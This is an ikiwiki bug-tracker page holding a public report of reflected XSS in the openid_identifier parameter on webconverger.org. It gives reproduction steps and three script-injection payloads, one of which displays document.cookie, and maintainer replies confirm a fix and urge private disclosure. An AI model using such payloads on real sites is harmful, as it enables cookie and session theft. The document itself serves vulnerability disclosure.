blob: d10361075cd421d38459c6fd050c92a72c995f8f (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
Respected Sir,
Your website "webconverger.org" is vulnerable to XSS Attack.
Vulnerable Links:
webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
How To Reproduce The Vulnerability :
1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
3. forward the request
XSS Payload :
1. `"></script><script>prompt(909043)</script>`
2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
3. `"></script><script>prompt(document.cookie)</script>`
NOTE : Proof of concept is attached.
Thank You...!!
Your Faithfully,
Raghav Bisht
raghav007bisht@gmail.com
> Thanks Raghav for reporting this issue. I've fixed it in ikiwiki.
>
> --[[Joey]]
>> [[Fix released|done]] as [[news/version_3.20150329]].
>>
>> Please try to report security vulnerabilities in private first,
>> to give maintainers a chance to fix them without making it easier
>> for attackers to exploit the newly discovered vulnerability
>> until the maintainer can respond ("[[!wikipedia responsible disclosure]]").
>> In this particular case, I was away from my computer for a few days
>> and was unable to make a release until I got back. --[[smcv]]
|